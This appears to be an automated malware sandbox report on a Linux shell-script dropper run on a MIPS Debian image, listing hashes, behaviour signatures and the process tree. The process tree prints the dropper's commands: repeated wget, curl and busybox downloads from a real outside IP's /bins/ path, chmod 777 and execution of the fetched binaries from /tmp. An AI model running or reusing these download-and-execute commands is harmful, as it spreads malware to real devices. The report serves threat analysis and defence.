Analysis
-
max time kernel
69s -
max time network
97s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
25/10/2024, 01:26
Static task
static1
Behavioral task
behavioral1
Sample
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh
-
Size
10KB
-
MD5
d230b0059d55644a966d0f2b3a653b23
-
SHA1
003616a6507ccbca767f2e56341b347b94f487da
-
SHA256
3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2
-
SHA512
a1badc3ffaa64936805465c8e74e14083c226341b67e35b985dee197f0a8487e2d4c99fcb203e633dd67e60963b748b38a743e4d94b48038d381bfdd460e2f4f
-
SSDEEP
96:iwrwrw7vQ4vx64/jk3WKJsPGOhC+tlxnAltsw/JlJdJgJRJNJ1ChSkdz/jk3WK8i:ik4ET564/jk3vJsbIW6/jk3v3lk4ETgB
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
File opened for reading: /proc/sys/crypto/fips_enabled (Process: curl) -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh/tmp/3de5523f3b546ee7c0ad86dd663e608fe072c6a276cb0e72e2ba834d1dca31a2.sh1⤵PID:700
-
/bin/rm/bin/rm bins.sh2⤵PID:704
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:706
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:718
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:727
-
-
/bin/chmodchmod 777 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- File and Directory Permissions Modification
PID:729
-
-
/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH./3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- Executes dropped EXE
PID:730
-
-
/bin/rmrm 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:731
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:733
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:734
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:735
-
-
/bin/chmodchmod 777 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h./q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- Executes dropped EXE
PID:737
-
-
/bin/rmrm q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:738
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:739
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:741
-
-
/bin/chmodchmod 777 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM./eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:744
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:745
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:749
-
-
/bin/chmodchmod 777 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd./Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- Executes dropped EXE
PID:757
-
-
/bin/rmrm Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:763
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:764
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:770
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:778
-
-
/bin/chmodchmod 777 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM./SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- Executes dropped EXE
PID:782
-
-
/bin/rmrm SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:786
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:787
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:803
-
-
/bin/chmodchmod 777 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI./EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:808
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:809
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:810
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:811
-
-
/bin/chmodchmod 777 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG./v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:814
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:815
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:817
-
-
/bin/chmodchmod 777 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B./GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- Executes dropped EXE
PID:819
-
-
/bin/rmrm GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:823
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:824
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:832
-
-
/bin/chmodchmod 777 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg./GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- Executes dropped EXE
PID:838
-
-
/bin/rmrm GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:840
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:842
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:847
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:854
-
-
/bin/chmodchmod 777 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj./KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:865
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:866
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:868
-
-
/bin/chmodchmod 777 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy./IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:871
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:872
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:874
-
-
/bin/chmodchmod 777 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc./IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:877
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:878
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:880
-
-
/bin/chmodchmod 777 XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5./XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:883
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:884
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:886
-
-
/bin/chmodchmod 777 Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw./Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:889
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:890
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:892
-
-
/bin/chmodchmod 777 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd./Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:895
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:896
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:898
-
-
/bin/chmodchmod 777 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM./SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:901
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:902
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:904
-
-
/bin/chmodchmod 777 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI./EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:907
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:908
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:910
-
-
/bin/chmodchmod 777 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG./v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:913
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:914
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:916
-
-
/bin/chmodchmod 777 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj./KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:919
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:920
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:922
-
-
/bin/chmodchmod 777 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy./IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:925
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:926
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:928
-
-
/bin/chmodchmod 777 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc./IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:931
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:932
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:934
-
-
/bin/chmodchmod 777 XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5./XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:937
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:938
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:940
-
-
/bin/chmodchmod 777 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B./GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:943
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:944
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:946
-
-
/bin/chmodchmod 777 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg./GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:949
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:950
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:952
-
-
/bin/chmodchmod 777 Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw./Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:955
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:956
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:958
-
-
/bin/chmodchmod 777 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH./3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:961
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:962
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:964
-
-
/bin/chmodchmod 777 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h./q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:967
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:968
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:970
-
-
/bin/chmodchmod 777 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM./eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:973
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97